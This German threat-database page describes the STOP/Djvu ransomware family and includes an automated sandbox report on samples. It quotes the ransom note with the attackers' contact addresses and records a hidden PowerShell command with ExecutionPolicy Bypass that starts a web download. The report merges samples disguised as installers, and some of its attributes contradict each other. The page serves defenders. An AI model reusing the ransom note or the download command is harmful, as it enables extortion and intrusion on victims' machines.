Bedrohungsdatenbank Ransomware STOP Djvu Ransomware

STOP Djvu Ransomware

Die STOP-Ransomware-Familie, auch STOP Djvu Ransomware-Familie genannt, ist eine bedrohliche Malware. Das STOP Djvu ist nur eine der zahlreichen Bedrohungen, die gemeinsame Merkmale aufweisen und von der STOP-Ransomware stammen, obwohl einige ihrer Methoden zur Beeinflussung von Dateitypen und zur Verschlüsselung von Dateierweiterungen unterschiedlich sind.

Die ursprüngliche STOP Ransomware wurde bereits im Februar 2018 von Sicherheitsforschern entdeckt. Seitdem hat sie sich jedoch weiterentwickelt und ihre Familie von Klonen und Ablegern ist gewachsen. Die primäre Methode zur Verbreitung der STOP-Ransomware waren Spam-E-Mail-Kampagnen mit beschädigten Anhängen.

Die STOP Djvu-Ransomware verhält sich ähnlich wie andere Ransomware-Bedrohungen dieser Art und verschlüsselt und blockiert den Zugriff auf Schlüsseldateien, die Benutzer möglicherweise in ihrem System verwenden. Persönliche Dateien, Bilder, Dokumente und mehr können für alle Benutzer auf dem Computer verschlüsselt und im Wesentlichen deaktiviert werden. STOP Djvu Ransomware wurde erstmals im Dezember 2018 in einer anscheinend recht erfolgreichen Online-Infektionskampagne entdeckt. Die Forscher waren sich der Verbreitung der Ransomware nicht bewusst, aber spätere Opfer berichteten, dass sie Infektionen entdeckten, nachdem sie Keygens oder Risse heruntergeladen hatten. Sobald die Infiltration erfolgt ist, ändert STOP Djvu Ransomware die Windows-Einstellungen und hängt Dateien mit einer Reihe von Namen an, z. B. .djvu, .djvus, .djvuu, .uudjvu, .udjvu oder .djvuq sowie die aktuellen Erweiterungen .promorad und .promock. Die neueren Versionen haben noch keinen Entschlüsseler, aber die älteren können mit dem STOPDecrypter entschlüsselt werden. Benutzern wird empfohlen, kein Lösegeld zu zahlen, egal was passiert.

Die Methode zum Blockieren des Zugriffs auf die Dateien verwendet den RSA-Verschlüsselungsalgorithmus. Obwohl die Entschlüsselung der Dateien für unerfahrene Benutzer schwierig erscheinen mag, besteht definitiv keine Notwendigkeit, Anstrengungen zu unternehmen, um die Personen zu bezahlen, die hinter der Bedrohung stehen. In solchen Situationen werden normalerweise falsche Versprechungen gemacht, sodass Benutzer schnell feststellen können, dass sie nach erfolgter Zahlung ignoriert werden.

Angriffe auf die STOP Djvu-Ransomware wurden erstmals Ende 2018 gemeldet. Die Hauptverteilungsmethode für die STOP Djvu blieb Spam-E-Mails, und Änderungen am Kern der Ransomware waren relativ gering. Die meisten gefälschten, kompromittierten Anhänge, die in den Spam-E-Mails verwendet wurden, waren makrofähige Office-Dokumente oder gefälschte PDF-Dateien, auf denen die Ransomware ohne Wissen des Opfers ausgeführt wurde. Das Verhalten des STOP Djvu hat sich ebenfalls nicht wesentlich geändert. Die Ransomware löscht weiterhin alle Shadow Volume-Snapshots, um Backups zu entfernen, und beginnt dann mit der Verschlüsselung der Dateien des Opfers.

Es gibt geringfügige Änderungen an der Lösegeldnotiz, die als '_openme.txt' auf dem Desktop des Opfers gespeichert wird. Den Text der Lösegeldnotiz finden Sie hier:

'[Lösegeldschein starten]
———————— ALLE IHRE DATEIEN SIND EINGESCHRIEBEN ————————

Keine Sorge, Sie können alle Ihre Dateien zurückgeben!
Alle Ihre Dateien, Dokumente, Fotos, Datenbanken und andere wichtige Dateien werden mit der stärksten Verschlüsselung und einem eindeutigen Schlüssel verschlüsselt.
Die einzige Methode zum Wiederherstellen von Dateien besteht darin, ein Entschlüsselungstool und einen eindeutigen Schlüssel für Sie zu erwerben.
Diese Software entschlüsselt alle Ihre verschlüsselten Dateien.
Welche Garantien geben wir Ihnen?
Sie können eine Ihrer verschlüsselten Dateien von Ihrem PC aus senden und wir entschlüsseln sie kostenlos.
Wir können aber nur 1 Datei kostenlos entschlüsseln. Die Datei darf keine wertvollen Informationen enthalten
Versuchen Sie nicht, Entschlüsselungstools von Drittanbietern zu verwenden, da diese Ihre Dateien zerstören.
Rabatt 50% verfügbar, wenn Sie uns in den ersten 72 Stunden kontaktieren.

————————————————————————————————————

Um diese Software zu erhalten, müssen Sie in unsere E-Mail schreiben:
helpshadow@india.com

Reservieren Sie eine E-Mail-Adresse, um uns zu kontaktieren:
helpshadow@firemail.cc

Ihre persönliche ID: [Zeichenfolge]
[Lösegeldscheinende] '

Die Ransomware beschränkte sich darauf, die verschlüsselten Dateien ursprünglich mit der Erweiterung .djvu umzubenennen. Dies war eine seltsame Wahl, da .djvu tatsächlich ein legitimes Dateiformat ist, das von den AT & T Labs entwickelt und zum Speichern gescannter Dokumente verwendet wurde, ähnlich dem PDF von Adobe. Spätere Versionen der Ransomware haben eine Reihe anderer Erweiterungen für verschlüsselte Dateien übernommen, darunter ".chech", ".luceq", ".kroput1", ".charck", ".kropun", ".luces", ".pulsar1". '' .uudjvu, '' .djvur, '' .tfude, '' .tfudeq 'und' .tfudet '.

Bestimmte Stämme der STOP Djvu Ransomware können mit dem sogenannten Sicherheits-STOPDecrypter, der vom Sicherheitsforscher Michael Gillespie entwickelt wurde und online als kostenloser Download verfügbar ist, kostenlos entschlüsselt werden.

STOP Djvu Ransomware Video

Tipp: Schalten Sie Ihren Ton EIN und sehen Sie sich das Video im Vollbildmodus an .

STOP Djvu Ransomware Screenshots

stop djvu ransomware note

Analysebericht

Allgemeine Information

Family Name: STOP/DJVU Ransomware
Signature status: No Signature

Known Samples

MD5: def8a7bfe5fe47d95a95085d8dbc7a53
SHA1: 7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256: B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
Dateigröße: 6.29 MB, 6292105 bytes
MD5: a6b8c0cb178c31dd347554c3e5a0d5f8
SHA1: 91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256: 4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
Dateigröße: 3.47 MB, 3471869 bytes
MD5: 2336c9624d9a44c393d354206226f508
SHA1: ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256: CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
Dateigröße: 1.36 MB, 1359918 bytes
MD5: 42f32aa699bc45a3638ddeb325ebebc1
SHA1: 508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256: 16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
Dateigröße: 1.33 MB, 1328186 bytes
MD5: 2391d41548b6432191f73edefa273928
SHA1: 620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256: 4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
Dateigröße: 3.36 MB, 3357556 bytes
Show More
MD5: 710c3a1beb616d4aa7d5ed9a7f8848e4
SHA1: 326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256: 051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
Dateigröße: 1.36 MB, 1364106 bytes
MD5: 601b120a6f39f72847b2f581a3d5f158
SHA1: 0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256: BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
Dateigröße: 4.86 MB, 4858569 bytes
MD5: a7b76a49f289081961f8f3824f0b62ca
SHA1: 6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256: 1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
Dateigröße: 1.41 MB, 1406899 bytes
MD5: 9f37930d62a1e08f68aa0a72472e7a55
SHA1: 27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256: 29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
Dateigröße: 600.12 KB, 600124 bytes
MD5: 7a18839fe61e9cde0e8fea3100acfb2b
SHA1: 9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256: 0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
Dateigröße: 316.83 KB, 316832 bytes
MD5: fe17d0f940a226e80cc18b4399da4ffc
SHA1: cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b
SHA256: D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713
Dateigröße: 1.36 MB, 1363661 bytes
MD5: ed83bea5600457af815495b10f235b87
SHA1: 14ac62ce3ae6b19186544e46ad7710d1814e3a9c
SHA256: FC0AE843E31F77574448FF343F0E92A9F1953B43DC2495FFE2CA5F7F8E777401
Dateigröße: 9.59 MB, 9590154 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is 32-bit executable
  • File is 64-bit executable
  • File is either console or GUI application
Show More
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Wert
Assembly Version 1.4.1.0
Comments This installation was built with Inno Setup.
Company Name
  • Alexander Roshal
  • TrayToolbar
  • win.rar GmbH
  • WinTools Software Engineering, Ltd.
File Description
  • Archiwizer WinRAR
  • Gestione archivi WinRAR
  • RAM Saver Professional
  • TrayToolbar
  • WinRAR 5.60 64 Bit Setup
  • WinRAR archiver
  • WinRAR Installer
File Version
  • 26.3.1
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.4.1
  • 7.21.0.0
  • 6.20.2
  • 6.2.0
  • 1.4.1.0
  • 1.3.0.0
Show More
  • 1.00
Internal Name
  • TJprojMain
  • TrayToolbar.dll
  • WinRAR
  • winrar-7.21-setup
Legal Copyright
  • Copyright © 1993-2026 Александр Рошал
  • Copyright © Alexander Roshal 1993-2021
  • Copyright © Alexander Roshal 1993-2022
  • Copyright © Alexander Roshal 1993-2025
  • © Brontech, LLC
Original Filename
  • TJprojMain.exe
  • TrayToolbar.dll
  • winrar-7.21-setup.exe
  • WinRAR.exe
Product Name
  • Project1
  • RAM Saver 25.4.1 Professional
  • RAM Saver 25.7.1 Professional
  • RAM Saver 26.0.1 Professional
  • RAM Saver 26.2.1 Professional
  • RAM Saver 26.3.1 Professional
  • TrayToolbar
  • WinRAR
  • WinRAR 5.60 64 Bit
  • WinRAR Installer
Product Version
  • 26.3.1
  • 26.2.1
  • 26.0.1
  • 25.7.1
  • 25.4.1
  • 7.21
  • 6.20.2
  • 6.2.0
  • 5.60
  • 1.4.1+80dec33e25323db7125ddec35b475aa881292801
Show More
  • 1.4.0
  • 1.00

Digital Signatures

Signer Root Status
win.rar GmbH DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 Self Signed
win.rar GmbH GlobalSign CodeSigning CA - SHA256 - G3 Hash Mismatch

File Traits

  • .NET
  • 2+ executable sections
  • big overlay
  • fptable
  • HighEntropy
  • Inno
  • InnoSetup Installer
  • Installer Manifest
  • Installer Version
  • MZ (In Overlay)
Show More
  • No Version Info
  • Nullsoft Installer
  • RAR (In Overlay)
  • RARinO
  • Run
  • SusSec
  • vb6
  • WinRAR SFX
  • WRARSFX
  • x64
  • x86

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
Show More
c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\nshfa46.tmp\chip.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\header.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\nsdialogs.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\screenshot.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\system.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\winrar-x64-721b1ru.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\yandex.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshfa46.tmp\yandexbrowsersetup.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsrfa35.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\system.dll Generic Write,Read Attributes

Registry Modifications

Key::Value Daten API Name
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 졷鑂셱ǜ RegNtPreCreateKey

Windows API Usage

Category API
Other Suspicious
  • SetWindowsHookEx
Anti Debug
  • IsDebuggerPresent
  • OutputDebugString
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ZwMapViewOfSection
Process Shell Execute
  • CreateProcess
Keyboard Access
  • GetKeyState
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
Show More
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForMultipleObjects
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • UNKNOWN
Encryption Used
  • BCryptOpenAlgorithmProvider

Shell Command Execution

"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
Show More
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient
"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"

Im Trend

Am häufigsten gesehen

Wird geladen...